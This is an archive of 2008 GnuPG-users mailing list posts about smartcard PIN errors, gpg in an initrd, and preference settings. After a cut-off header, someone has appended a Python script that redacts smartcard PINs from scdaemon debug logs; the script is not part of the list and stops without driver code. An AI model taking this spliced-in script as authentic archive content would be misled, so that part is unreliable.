From: clive.hunt at gmail.com (CliveSRT) Date: Wed, 18 Jun 2008 06:22:17 -0700 (PDT) Subject: removing (uninstalling) GNUPG / GPG4Win 1.1.0.407 In-Reply-To: References: Message-ID: <17982584.post@talk.nabble.com> There should be an entry in ADD & REMOVE Programs for the software installed. Not sure that messing with the registry would be a good idea. The error you are getting is because the program can no longer be found by Outlook. Suggest either reinstalling the application so as to replace the files or alternatively go to TOOLS and then OPTIONS then select OTHER and ADVANCED OPTIONS. Then click ADD-IN MANAGER and remove the tick from the item GPGol. Hope this helps. EduBu wrote: > > Hi there! > > How should I proceed, in order to completely uninstall GNUPG / GPG4Win > (version 1.1.0.407) from my system, without leaving any tracks of it in > the > Registry? I do not find anything at all of this program in the Control > Panel > ("Add/Remove Programs)". Neither do I find any "uninstall-file" in the > folder, in which the program has been installed ("C:\...\GNU\...). > > My Operating System is Windows XP Professional SP2. > > Remark: each time while opening Outlook (Brazilian-Portuguese version 2002 > SP3), there always appear a warning screen, saying (translated now, from > Portuguese to English) that the file "C:\...\GNU\GnuPG\gpgol.dll" can not > be > installed or loaded; furthermore, this warning message says that there > could > be insufficient memory, ore that the .dll file could not be found. As a > matter of fact, this "gpgol.dll" file is missing on my system. > > So, does anyone know how to remove this program correctly? Thanks! 
> > Eduardo Burkhard > > > > _______________________________________________ > Gnupg-users mailing list > Gnupg-users at gnupg.org > http://lists.gnupg.org/mailman/listinfo/gnupg-users > > -- View this message in context: http://www.nabble.com/removing-%28uninstalling%29-GNUPG---GPG4Win-1.1.0.407-tp17627003p17982584.html Sent from the GnuPG - User mailing list archive at Nabble.com. From faramir.cl at gmail.com Sat Jun 21 05:32:06 2008 From: faramir.cl at gmail.com (Faramir) Date: Fri, 20 Jun 2008 23:32:06 -0400 Subject: About my prefered settings... Message-ID: <485C7636.3040809@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Well, I have avoided messing with the preferences settings of gpg, since I don't fully understand how it works, and I am a bit afraid of breaking something. In particular, I don't want to deliver messages that can't be read by the recipient... I confess I am not good for console commands, it has been a long time since I knew how to work with ms-dos, so I have been using gpgshell to provide a GUI for gpg, and be able to use it easily (I am a windows user). But now, I would like to know what cipher algorithms, hash function and compression I am using... and of course, I don't know how to know it. Is there a way to know, by looking at my public key (or sending some command to gpg), what is my preferred settings? Regards -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org -----END PGP SIGNATURE----- From faramir.cl at gmail.com Mon Jun 23 07:53:49 2008 
From: faramir.cl at gmail.com (Faramir) Date: Mon, 23 Jun 2008 01:53:49 -0400 Subject: Testing (I got a "delayed message notification") Message-ID: <485F3A6D.6040302@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 And I wanted to test if the list is working, or if it is down... -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org -----END PGP SIGNATURE----- From christoph.anton.mitterer at physik.uni-muenchen.de Mon Jun 23 10:31:05 2008 From: christoph.anton.mitterer at physik.uni-muenchen.de (Christoph Anton Mitterer) Date: Mon, 23 Jun 2008 10:31:05 +0200 Subject: (possible) feature request ;-) Message-ID: <1214209865.10960.9.camel@etppc19> Hi. I'm writing a suite of scripts and a little framework for the use of cryptsetup/dm-crypt within an initrd for Debian. This also includes a keyscript to decrypt (symmetrically) OpenPGP encrypted dm-crypt keys. I'm suggesting that such keys have the for-your-eyes flag set (because it shouldn't be necessary to write them to disk). gpg seems to always write that warning message (that the message is for your eyes only) even when writing to stdout (where stdout is a console) or when piping to a file. Switches like --quiet or so don't change this. Is it already possible to somehow suppress this message (without suppressing others like no-MDC or so)? If not would you consider to add a simple option? Thanks, Chris. From jmoore3rd at bellsouth.net Mon Jun 23 10:48:03 2008 
From: jmoore3rd at bellsouth.net (John W. Moore III) Date: Mon, 23 Jun 2008 04:48:03 -0400 Subject: About my prefered settings... In-Reply-To: <485C7636.3040809@gmail.com> References: <485C7636.3040809@gmail.com> Message-ID: <485F6343.20604@bellsouth.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Faramir wrote: > But now, I would like to know what cipher algorithms, hash function and > compression I am using... and of course, I don't know how to know it. Is > there a way to know, by looking at my public key (or sending some > command to gpg), what is my preferred settings? Using GPGshell highlight Your Key and then look in the GPGshell icon toolbar and You'll see 'CLI' in the upper right corner. From its drop down menu select: showpref You may also use the command showpref by highlighting Your Key and then choosing Edit > All Settings from the Right Click context Menu. JOHN ;) Timestamp: Monday 23 Jun 2008, 04:46 --400 (Eastern Daylight Time) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.5.0-svn4754: (MingW32) Comment: Public Key at: http://tinyurl.com/8cpho Comment: Gossamer Spider Web of Trust: https://www.gswot.org Comment: Homepage: http://tinyurl.com/yzhbhx -----END PGP SIGNATURE----- From eddrobinson at gmail.com Mon Jun 23 11:18:52 2008 
From: eddrobinson at gmail.com (Edward Robinson) Date: Mon, 23 Jun 2008 10:18:52 +0100 Subject: Oh Dear, Pin Entry Broken on openPGP card! Message-ID: <485F6A7C.2010204@gmail.com> Hello all, For some reason entering the pin to my smartcard card (for decrypting, signing, authenticating) has broken... $ gpg --card-status Returns, among the usual blurb this: PIN retry counter : 3 0 3. I am pretty sure that this should say 3 3 3 or 2 2 3 or 0 0 3. basically the first and second digit (which refer to the unlocking pin) should always be the same. 3 0 3 should not happen.... Whenever I enter my pin to decrypt something i get: $ gpg Desktop/myTest.txt.pgp gpg: detected reader `OmniKey CardMan 3121 00 00' PIN (Here pin-entry-gtk2 pops up and asks me for my pin, which I enter) gpg: verify CHV2 failed: invalid passphrase gpg: encrypted with ELG-E key, ID 00000000 gpg: encrypted with 1024-bit RSA key, ID 987D9D66, created 2008-04-25 "Edward Robinson " gpg: public key decryption failed: invalid passphrase gpg: decryption failed: secret key not available I am 100% sure I haven't forgotten the pin!!! I am definitely putting the correct pin in. $ gpg --edit-card Command> verify PIN (pinentrygtk2 asks for the pin, I enter it and get the following:) gpg: verify CHV2 failed: invalid passphrase So then I try this: $ gpg --change-pin 1 - change PIN 2 - unblock PIN 3 - change Admin PIN Q - quit Your selection? 2 gpg: sending command `SCD PASSWD' to agent failed: ec=6.32769 Error unblocking the PIN: general error I have no idea how to proceed, I can't unblock the pin (that is if it is even block CHV1 = 3 would suggest not...) 
$ dpkg -l |grep gnupg ii gnupg 1.4.6-2.2 GNU privacy guard - a free PGP replacement ii gnupg-agent 2.0.9-2 GNU privacy guard - password agent ii gnupg2 2.0.9-2 GNU privacy guard - a free PGP replacement ii python-gnupginterface 0.3.2-9 Python interface to GnuPG (GPG) $ dpkg -l |grep gpg ii gpgsm 2.0.9-2 GNU privacy guard - S/MIME version ii gpgv 1.4.6-2.2 GNU privacy guard - signature verification t ii libgpg-error0 1.4-2 library for common error values and messages ii libgpgme11 1.1.6-2 GPGME - GnuPG Made Easy $ dpkg -l |grep pinentry ii pinentry-curses 0.7.5-2 curses-based PIN or pass-phrase entry dialog ii pinentry-gtk2 0.7.5-2 GTK+-2-based PIN or pass-phrase entry dialog gpg-agent.conf: pinentry-program /usr/bin/pinentry-gtk-2 default-cache-ttl 10 enable-ssh-support gpg.conf: use-agent #default recipient is my encryption subkey default-recipient 0x987D9D66! #Hidden encryption to my 2048 subkey hidden-encrypt-to 0x87F568A7! #key to encrypt with by default default-key 0x3A5F0761! #KEY SERVER keyserver hkp://keyserver.ubuntu.com Any ideas?? Cheers, Edd From christoph.anton.mitterer at physik.uni-muenchen.de Sat Jun 21 21:46:34 2008 
From: christoph.anton.mitterer at physik.uni-muenchen.de (Christoph Anton Mitterer) Date: Sat, 21 Jun 2008 21:46:34 +0200 Subject: gpg unusable from within an initrd Message-ID: <1214077594.3374.4.camel@fermat.scientia.net> Hi. I have to use gpg from within an initrd. /dev/tty is not available (an won't be) only /dev/console is here. But whatever I do gpg complains: Without --no-tty it complains that /dev/tty isn't there (gpg: cannot open '/dev/tty': No such device or address) With it, in complains "gpg: Sorry, no terminal at all requested - can't get input" It doesn't even work to redirect /dev/console to gpg e.g. gpg --quiet --no-greeting --no-default-keyring --keyring /dev/null --secret-keyring /dev/null --no-options --no-random-seed-file --no-use-agent --decrypt file < /dev/console > /dev/console 2>&1 (no matter whether with or without --no-tty) When using /dev/console as --passphrase-file this broke my whole system and the keyboard ... I hat to kill it... :-L Any ideas? Chris. From wk at gnupg.org Mon Jun 23 11:45:06 2008 From: wk at gnupg.org (Werner Koch) Date: Mon, 23 Jun 2008 11:45:06 +0200 Subject: Testing (I got a "delayed message notification") In-Reply-To: <485F3A6D.6040302@gmail.com> (faramir.cl@gmail.com's message of "Mon, 23 Jun 2008 01:53:49 -0400") References: <485F3A6D.6040302@gmail.com> Message-ID: <87ve00a3j1.fsf@wheatstone.g10code.de> On Mon, 23 Jun 2008 07:53, faramir.cl at gmail.com said: > And I wanted to test if the list is working, or if it is down... Disk full. Sorry for the trouble. Shalom-Salam, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From wk at gnupg.org Mon Jun 23 11:51:13 2008 
From: wk at gnupg.org (Werner Koch) Date: Mon, 23 Jun 2008 11:51:13 +0200 Subject: (possible) feature request ;-) In-Reply-To: <1214209865.10960.9.camel@etppc19> (Christoph Anton Mitterer's message of "Mon, 23 Jun 2008 10:31:05 +0200") References: <1214209865.10960.9.camel@etppc19> Message-ID: <87r6aoa38u.fsf@wheatstone.g10code.de> On Mon, 23 Jun 2008 10:31, christoph.anton.mitterer at physik.uni-muenchen.de said: > I'm suggesting that such keys have the for-your-eyes flag set (because > it shouldn't be necessary to write them to disk). This flag is a property of the encrypted message and not of the key. I consider it as pretty useless because most people don't use gpg on the command line. > gpg seems to always write that warning message (that the message is for > your eyes only) even when writing to stdout (where stdout is a console) > or when piping to a file. No. The creator of the message asked to display this message and thus gpg does it. > Is it already possible to somehow suppress this message (without > suppressing others like no-MDC or so)? If not would you consider to add Ask the sender not to use --for-your-eyes-only and not to use a filename "_CONSOLE". Salam-Shalom, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From wk at gnupg.org Mon Jun 23 11:57:59 2008 
From: wk at gnupg.org (Werner Koch)
Date: Mon, 23 Jun 2008 11:57:59 +0200
Subject: Oh Dear, Pin Entry Broken on openPGP card!
In-Reply-To: <485F6A7C.2010204@gmail.com> (Edward Robinson's message of "Mon, 23 Jun 2008 10:18:52 +0100")
References: <485F6A7C.2010204@gmail.com>
Message-ID: <87mylca2xk.fsf@wheatstone.g10code.de>

On Mon, 23 Jun 2008 11:18, eddrobinson at gmail.com said:

> Returns, among the usual blurb this: PIN retry counter : 3 0 3. I am pretty
> sure that this should say 3 3 3 or 2 2 3 or 0 0 3. basically the first and
> second digit (which refer to the unlocking pin) should always be the same. 3
> 0 3 should not happen....

The second retry counter is used for the second PIN. In general gpg tries to sync the second PIN with the first PIN but that may fail under some circumstances. Note that it is not an unblocking PIN but the PIN used for the decryption key.

> $ gpg --change-pin
>
> 1 - change PIN
> 2 - unblock PIN
> 3 - change Admin PIN
> Q - quit
>
> Your selection? 2

Try 1 (change PIN). This should sync it again. BTW, you may do the same by using

  $ gpg --card-edit
  Command> admin
  Command> passwd

Shalom-Salam,

   Werner

--
Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz.

From wk at gnupg.org Mon Jun 23 11:59:48 2008
From: wk at gnupg.org (Werner Koch)
Date: Mon, 23 Jun 2008 11:59:48 +0200
Subject: gpg unusable from within an initrd
In-Reply-To: <1214077594.3374.4.camel@fermat.scientia.net> (Christoph Anton Mitterer's message of "Sat, 21 Jun 2008 21:46:34 +0200")
References: <1214077594.3374.4.camel@fermat.scientia.net>
Message-ID: <87ej6oa2uj.fsf@wheatstone.g10code.de>

On Sat, 21 Jun 2008 21:46, christoph.anton.mitterer at physik.uni-muenchen.de said:

> With it, in complains "gpg: Sorry, no terminal at all requested - can't
> get input"

Add option "--batch".

Salam-Shalom,

   Werner

--
Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz.

From faramir.cl at gmail.com Mon Jun 23 11:59:44 2008
From: faramir.cl at gmail.com (Faramir)
Date: Mon, 23 Jun 2008 05:59:44 -0400
Subject: About my prefered settings...
In-Reply-To: <485F6343.20604@bellsouth.net>
References: <485C7636.3040809@gmail.com> <485F6343.20604@bellsouth.net>
Message-ID: <485F7410.4040901@gmail.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

John W. Moore III wrote:
> Faramir wrote:
>
>> But now, I would like to know what cipher algorithms, hash function and
>> compression I am using... and of course, I don't know how to know it. Is
>> there a way to know, by looking at my public key (or sending some
>> command to gpg), what is my preferred settings?
>
> Using GPGshell highlight Your Key and then look in the GPGshell icon
> toolbar and You'll see 'CLI' in the upper right corner. From its drop
> down menu select: showpref
>
> You may also use the command showpref by highlighting Your Key and then
> choosing Edit > All Settings from the Right Click context Menu.

Thanks, I did it, and found the following:

Cifrado: AES256, AES192, AES, CAST5, 3DES (cipher)
Resumen: SHA1, SHA256, RIPEMD160 (hashing)
Compresión: ZLIB, BZIP2, ZIP, Sin comprimir [no compression] (compression)
Características: MDC, Sevidor de claves no-modificar (settings, maybe?)

Well, it seems I have not messed the config (yet)... Now the question is: how do I set a "default preferred ^thing to use^" without making unavailable the other algorithms? The idea is to use the custom setting only when the recipient can receive messages using these settings... I think I'd like to use AES256, SHA256, and ZIP, but only if that doesn't produce unusable messages...
Regards -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org -----END PGP SIGNATURE----- From eddrobinson at gmail.com Mon Jun 23 12:36:14 2008 From: eddrobinson at gmail.com (Edward Robinson) Date: Mon, 23 Jun 2008 11:36:14 +0100 Subject: Oh Dear, Pin Entry Broken on openPGP card! In-Reply-To: <87mylca2xk.fsf@wheatstone.g10code.de> References: <485F6A7C.2010204@gmail.com> <87mylca2xk.fsf@wheatstone.g10code.de> Message-ID: <485F7C9E.7030109@gmail.com> Werner, thanks for your quick reply (as usual!). > Try 1 (change PIN). This should sync it again. BTW, you may do the same by > using > > $ gpg --card-edit > Command> admin > Command> passwd $ gpg --change-pin gpg: OpenPGP card no. D27600012401010100010000101E0000 detected 1 - change PIN 2 - unblock PIN 3 - change Admin PIN Q - quit Your selection? 1 [When pinentry pops up it says: "Please enter the PIN (`PIN') to unlock the card". I then enter my pin, the box closes and the terminal responds with:] gpg: sending command `SCD PASSWD' to agent failed: ec=6.130 Error changing the PIN: general error From sattva at pgpru.com Mon Jun 23 12:45:27 2008 
From: sattva at pgpru.com (Vlad "SATtva" Miller)
Date: Mon, 23 Jun 2008 17:45:27 +0700
Subject: gpg unusable from within an initrd
In-Reply-To: <87ej6oa2uj.fsf@wheatstone.g10code.de>
References: <1214077594.3374.4.camel@fermat.scientia.net> <87ej6oa2uj.fsf@wheatstone.g10code.de>
Message-ID: <485F7EC7.2030509@pgpru.com>

Werner Koch (23.06.2008 16:59):
> On Sat, 21 Jun 2008 21:46,
> christoph.anton.mitterer at physik.uni-muenchen.de said:
>
>> With it, in complains "gpg: Sorry, no terminal at all requested - can't
>> get input"
>
> Add option "--batch".

Or, if interactive mode is desired, place this in your initrd script:

mv /dev/tty /dev/tty.bak
cp -a /dev/console /dev/tty

#
# do gpg stuff here
#

rm /dev/tty
mv /dev/tty.bak /dev/tty

--
SATtva | security & privacy consulting
www.vladmiller.info | www.pgpru.com

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 513 bytes
Desc: OpenPGP digital signature
URL:

From Yasuhiro.Funaki at safenet-inc.com Fri Jun 20 13:15:14 2008
From: Yasuhiro.Funaki at safenet-inc.com (Funaki, Yasuhiro) Date: Fri, 20 Jun 2008 19:15:14 +0800 Subject: Session Key algorithm Message-ID: <8919D897E400EC4A85E30E35FFBF702018A34C@pok1exch002.sfnt.local> Dear Expert, I am wondering that which algorithm is used for the session key in GnuPG 1.4.8? I understand the session key is symmetric key and used for message encryption, my concern is the compatibility with PGP commercial. i.e PGP commercial use IDEA but GnuPG does not have it, then message can not be decrypted with Gnupg?? Have a nice day. Yasuhiro The information contained in this electronic mail transmission may be privileged and confidential, and therefore, protected from disclosure. If you have received this communication in error, please notify us immediately by replying to this message and deleting it from your computer without copying or disclosing it. From e.robinson at cs.bham.ac.uk Sun Jun 22 13:59:50 2008 
From: e.robinson at cs.bham.ac.uk (Edward Robinson) Date: Sun, 22 Jun 2008 12:59:50 +0100 Subject: Oh Dear, Pin Entry Broken on openPGP card! Message-ID: <485E3EB6.5020602@cs.bham.ac.uk> Hello all, For some reason entering the pin to my smartcard card (for decrypting, signing, authenticating) has broken... $ gpg --card-status Returns, among the usual blurb this: PIN retry counter : 3 0 3. I am pretty sure that this should say 3 3 3 or 2 2 3 or 0 0 3. basically the first and second digit (which refer to the unlocking pin) should always be the same. 3 0 3 should not happen.... Whenever I enter my pin to decrypt something i get: $ gpg Desktop/myTest.txt.pgp gpg: detected reader `OmniKey CardMan 3121 00 00' PIN (Here pin-entry-gtk2 pops up and asks me for my pin, which I enter) gpg: verify CHV2 failed: invalid passphrase gpg: encrypted with ELG-E key, ID 00000000 gpg: encrypted with 1024-bit RSA key, ID 987D9D66, created 2008-04-25 "Edward Robinson " gpg: public key decryption failed: invalid passphrase gpg: decryption failed: secret key not available I am 100% sure I haven't forgotten the pin!!! I am definitely putting the correct pin in. $ gpg --edit-card Command> verify PIN (pinentrygtk2 asks for the pin, I enter it and get the following:) gpg: verify CHV2 failed: invalid passphrase So then I try this: $ gpg --change-pin 1 - change PIN 2 - unblock PIN 3 - change Admin PIN Q - quit Your selection? 2 gpg: sending command `SCD PASSWD' to agent failed: ec=6.32769 Error unblocking the PIN: general error I have no idea how to proceed, I can't unblock the pin (that is if it is even block CHV1 = 3 would suggest not...) 
$ dpkg -l |grep gnupg ii gnupg 1.4.6-2.2 GNU privacy guard - a free PGP replacement ii gnupg-agent 2.0.9-2 GNU privacy guard - password agent ii gnupg2 2.0.9-2 GNU privacy guard - a free PGP replacement ii python-gnupginterface 0.3.2-9 Python interface to GnuPG (GPG) $ dpkg -l |grep gpg ii gpgsm 2.0.9-2 GNU privacy guard - S/MIME version ii gpgv 1.4.6-2.2 GNU privacy guard - signature verification t ii libgpg-error0 1.4-2 library for common error values and messages ii libgpgme11 1.1.6-2 GPGME - GnuPG Made Easy $ dpkg -l |grep pinentry ii pinentry-curses 0.7.5-2 curses-based PIN or pass-phrase entry dialog ii pinentry-gtk2 0.7.5-2 GTK+-2-based PIN or pass-phrase entry dialog gpg-agent.conf: pinentry-program /usr/bin/pinentry-gtk-2 default-cache-ttl 10 enable-ssh-support gpg.conf: use-agent #default recipient is my encryption subkey default-recipient 0x987D9D66! #Hidden encryption to my 2048 subkey hidden-encrypt-to 0x87F568A7! #key to encrypt with by default default-key 0x3A5F0761! #KEY SERVER keyserver hkp://keyserver.ubuntu.com Any ideas?? Cheers, Edd From calestyo at scientia.net Sat Jun 21 22:35:03 2008 From: calestyo at scientia.net (Christoph Anton Mitterer) Date: Sat, 21 Jun 2008 22:35:03 +0200 Subject: gpg unusable from within an initrd In-Reply-To: <1214077594.3374.4.camel@fermat.scientia.net> References: <1214077594.3374.4.camel@fermat.scientia.net> Message-ID: <1214080503.3374.10.camel@fermat.scientia.net> I've just seen: On Sat, 2008-06-21 at 21:46 +0200, Christoph Anton Mitterer wrote: > /dev/tty is not available (an won't be) /dev/tty is there (5,0) and readable. No idea which problems gpg has... :-/ Chris. -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 5108 bytes Desc: not available URL: From niknot at gmail.com Fri Jun 20 06:51:00 2008 
From: niknot at gmail.com (Nik N) Date: Fri, 20 Jun 2008 04:51:00 +0000 Subject: Remove public key from secret key In-Reply-To: References: <48551C98.3070809@digitalbrains.com> Message-ID: <328a5cf40806192151u47144186kfafac8db10e0a0fd@mail.gmail.com> Isn't this the case where symmetric encryption would be a perfectly adequate solution? NikNot From christoph.anton.mitterer at physik.uni-muenchen.de Mon Jun 23 13:30:18 2008 From: christoph.anton.mitterer at physik.uni-muenchen.de (Christoph Anton Mitterer) Date: Mon, 23 Jun 2008 13:30:18 +0200 Subject: (possible) feature request ;-) In-Reply-To: <87r6aoa38u.fsf@wheatstone.g10code.de> References: <1214209865.10960.9.camel@etppc19> <87r6aoa38u.fsf@wheatstone.g10code.de> Message-ID: <1214220618.10960.138.camel@etppc19> On Mon, 2008-06-23 at 11:51 +0200, Werner Koch wrote: > > I'm suggesting that such keys have the for-your-eyes flag set (because > > it shouldn't be necessary to write them to disk). > This flag is a property of the encrypted message and not of the key. Of course,.. with "key", I didn't meant any OpenPGP key,.. and of course not the dm-crypt key itself,.. but the encrypted dm-crypt key... > > Is it already possible to somehow suppress this message (without > > suppressing others like no-MDC or so)? If not would you consider to add > > Ask the sender not to use --for-your-eyes-only and not to use a > filename "_CONSOLE". There is no "sender" (at least from the classic point of view)... I simply use gpg's/OpenPGP's symmetric encryption parts (to be exact: a symmetrically encrypted data packet, with symmetrically encrypted session key packets). I set the flag, that nobody writes the key to disk (by accident) if he uses gpg manually on the encrypted file. But when I decrypt it in the intended scripts I'd like to suppres the warning... Chris. From christoph.anton.mitterer at physik.uni-muenchen.de Mon Jun 23 13:31:50 2008 
From: christoph.anton.mitterer at physik.uni-muenchen.de (Christoph Anton Mitterer) Date: Mon, 23 Jun 2008 13:31:50 +0200 Subject: gpg unusable from within an initrd In-Reply-To: <87ej6oa2uj.fsf@wheatstone.g10code.de> References: <1214077594.3374.4.camel@fermat.scientia.net> <87ej6oa2uj.fsf@wheatstone.g10code.de> Message-ID: <1214220710.10960.141.camel@etppc19> On Mon, 2008-06-23 at 11:59 +0200, Werner Koch wrote: > Add option "--batch". Doesn't this disable any interactions like entering the passphrase? Thanks, Chris. From christoph.anton.mitterer at physik.uni-muenchen.de Mon Jun 23 13:33:09 2008 From: christoph.anton.mitterer at physik.uni-muenchen.de (Christoph Anton Mitterer) Date: Mon, 23 Jun 2008 13:33:09 +0200 Subject: gpg unusable from within an initrd In-Reply-To: <485F7EC7.2030509@pgpru.com> References: <1214077594.3374.4.camel@fermat.scientia.net> <87ej6oa2uj.fsf@wheatstone.g10code.de> <485F7EC7.2030509@pgpru.com> Message-ID: <1214220789.10960.144.camel@etppc19> On Mon, 2008-06-23 at 17:45 +0700, Vlad "SATtva" Miller wrote: > Or, if interactive mode is desired, place this in your initrd script: > > mv /dev/tty /dev/tty.bak > cp -a /dev/console /dev/tty > > # > # do gpg stuff here > # > > rm /dev/tty > mv /dev/tty.bak /dev/tty That's what I do right now (ok I use ln -s instead of cp ;) ) but I considered this only as a workaround... as this could lead to problems (when someone tries to access (the real) /dev/tty in the meantime or so). Thanks, Chris. From wk at gnupg.org Mon Jun 23 16:30:13 2008 
From: wk at gnupg.org (Werner Koch) Date: Mon, 23 Jun 2008 16:30:13 +0200 Subject: (possible) feature request ;-) In-Reply-To: <1214220618.10960.138.camel@etppc19> (Christoph Anton Mitterer's message of "Mon, 23 Jun 2008 13:30:18 +0200") References: <1214209865.10960.9.camel@etppc19> <87r6aoa38u.fsf@wheatstone.g10code.de> <1214220618.10960.138.camel@etppc19> Message-ID: <87fxr48bre.fsf@wheatstone.g10code.de> On Mon, 23 Jun 2008 13:30, christoph.anton.mitterer at physik.uni-muenchen.de said: > I set the flag, that nobody writes the key to disk (by accident) if he > uses gpg manually on the encrypted file. You can't avoid that. --for-your-eyes-only is a very weak gadget and only implemented for PGP 2 compatibility. The usual way I invoke gpg is using gpg outfile and that will always work. OpenPGP does not require ant special processing: If the special name "_CONSOLE" is used, the message is considered to be "for your eyes only". This advises that the message data is unusually sensitive, and the receiving program should process it more carefully, perhaps avoiding storing the received data to disk, for example. A data encryption key for the file system is not "for your eyes only" it is for the entire file system. Shalom-Salam, Werner -- Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz. From christoph.anton.mitterer at physik.uni-muenchen.de Mon Jun 23 16:40:44 2008 
From: christoph.anton.mitterer at physik.uni-muenchen.de (Christoph Anton Mitterer) Date: Mon, 23 Jun 2008 16:40:44 +0200 Subject: (possible) feature request ;-) In-Reply-To: <87fxr48bre.fsf@wheatstone.g10code.de> References: <1214209865.10960.9.camel@etppc19> <87r6aoa38u.fsf@wheatstone.g10code.de> <1214220618.10960.138.camel@etppc19> <87fxr48bre.fsf@wheatstone.g10code.de> Message-ID: <1214232044.10960.162.camel@etppc19> On Mon, 2008-06-23 at 16:30 +0200, Werner Koch wrote: > On Mon, 23 Jun 2008 13:30, > christoph.anton.mitterer at physik.uni-muenchen.de said: > > > I set the flag, that nobody writes the key to disk (by accident) if he > > uses gpg manually on the encrypted file. > > You can't avoid that. --for-your-eyes-only is a very weak gadget and > only implemented for PGP 2 compatibility. The usual way I invoke gpg is > using > > gpg outfile > > and that will always work. OpenPGP does not require ant special > processing: > > If the special name "_CONSOLE" is used, the message is considered to > be "for your eyes only". This advises that the message data is > unusually sensitive, and the receiving program should process it more > carefully, perhaps avoiding storing the received data to disk, for > example. Yeah,.. I know all this. > A data encryption key for the file system is not "for your eyes only" it > is for the entire file system. Ok,.. I'll remove it manually.. Chris. From wk at gnupg.org Mon Jun 23 16:56:39 2008 
From: wk at gnupg.org (Werner Koch)
Date: Mon, 23 Jun 2008 16:56:39 +0200
Subject: Oh Dear, Pin Entry Broken on openPGP card!
In-Reply-To: <485F7C9E.7030109@gmail.com> (Edward Robinson's message of "Mon, 23 Jun 2008 11:36:14 +0100")
References: <485F6A7C.2010204@gmail.com> <87mylca2xk.fsf@wheatstone.g10code.de> <485F7C9E.7030109@gmail.com>
Message-ID: <87bq1s8ajc.fsf@wheatstone.g10code.de>

On Mon, 23 Jun 2008 12:36, eddrobinson at gmail.com said:

> [When pinentry pops up it says: "Please enter the PIN (`PIN') to
> unlock the card". I then enter my pin, the box closes and the
> terminal responds with:]

I was wrong. Your first try with "unblock PIN" was correct. The unblocking requires the Admin-PIN which makes perfect sense because the PIN has already been blocked.

There might be a problem in the code. I have no time today to check this, so I need to ask you to help with debugging:

- Put "debug 2048" into ~/.gnupg/scdaemon.conf

- Put "logfile /foo/bar/scdaemon.log" into ~/.gnupg/scdaemon.conf

- Kill scdaemon ("pkill scdaemon" two times and check that it has gone).

- Try again to unblock the PIN

- Sanitize the log file: Look for

    : connection to PIN entry established
    : send apdu: c=00 i=20 p0=00 p1=82 lc=6 le=-1
    : APDU_data: 00 20 00 82 06 31 32 33 34 35 36
                                ^^^^^^^^^^^^^^^^^
    : response: sw=9000 datalen=0
    : dump:

  The marked bytes make up your passphrase. In this case "123456", the byte just before is the length of the passphrase. Remove that from the log file. The example above is for the regular PIN, you will be asked for the admin pin, which should look more like:

    : send apdu: c=00 i=20 p0=00 p1=83 lc=8 le=-1
    : APDU_data: 00 20 00 83 08 31 32 33 34 35 36 37 38

- Send me the log file (wk at gnupg.org). I need a couple of lines more than shown above. In particular the lines with i=24 and i=2c.

Salam-Shalom,

   Werner

--
Die Gedanken sind frei. Auschnahme regelt ein Bundeschgesetz.

From wk at gnupg.org Mon Jun 23 17:24:05 2008
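Added example, not part of Werner's message and not GnuPG code: a small Python filter for the "Sanitize the log file" step above. It blanks the data bytes of PIN-carrying APDU dumps and then checks that the PIN's hex encoding no longer appears anywhere. The sample log is constructed in the line shapes quoted in the message (the "scdaemon[PID]:" prefix is a placeholder), and treating i=24 and i=2c like i=20 is an assumption of this example.

```python
import re

# INS bytes whose data field holds PIN material. 0x20 is the case shown in
# the message; handling 0x24 and 0x2C the same way is this example's assumption.
PIN_INS = {0x20, 0x24, 0x2C}
MARK = "APDU_data:"
OCTET = re.compile(r"^[0-9A-Fa-f]{2}$")

# Constructed sample, following the line shapes quoted in the message.
SAMPLE_LOG = """\
scdaemon[PID]: connection to PIN entry established
scdaemon[PID]: send apdu: c=00 i=20 p0=00 p1=83 lc=8 le=-1
scdaemon[PID]: APDU_data: 00 20 00 83 08 31 32 33 34 35 36 37 38
scdaemon[PID]: response: sw=9000 datalen=0
scdaemon[PID]: send apdu: c=00 i=2C p0=02 p1=81 lc=6 le=-1
scdaemon[PID]: APDU_data: 00 2C 02 81 06 36 35 34 33 32 31
scdaemon[PID]: response: sw=9000 datalen=0
scdaemon[PID]: send apdu: c=00 i=CA p0=00 p1=6E lc=-1 le=256
scdaemon[PID]: APDU_data: 00 CA 00 6E 00
scdaemon[PID]: APDU_data: 00 20 00 82 06 3132 33 34 35 36
""".splitlines()


def redact_line(line):
    """Return (line, changed).

    Keeps the 4-byte APDU header and the length byte so the log stays useful
    for debugging, and replaces every byte after them with XX. With an
    extended-length APDU the extra length bytes are blanked too, which errs
    on the safe side.
    """
    head, sep, tail = line.partition(MARK)
    if not sep:
        return line, False
    octets = tail.split()
    if octets and not all(OCTET.match(o) for o in octets):
        # Fail closed: a dump that does not parse may still contain the PIN.
        return f"{head}{MARK} [unparsed, removed]", True
    if len(octets) <= 5 or int(octets[1], 16) not in PIN_INS:
        return line, False
    redacted = octets[:5] + ["XX"] * (len(octets) - 5)
    return f"{head}{MARK} {' '.join(redacted)}", True


def sanitize(lines):
    """Redact every line; return (clean_lines, number_of_lines_changed)."""
    out, count = [], 0
    for line in lines:
        new, changed = redact_line(line)
        out.append(new)
        count += changed
    return out, count


def pin_leaks(lines, pin):
    """1-based numbers of lines that still contain the PIN as hex octets."""
    needle = " ".join(f"{b:02x}" for b in pin.encode("ascii"))
    return [n for n, line in enumerate(lines, 1)
            if needle in " ".join(line.lower().split())]


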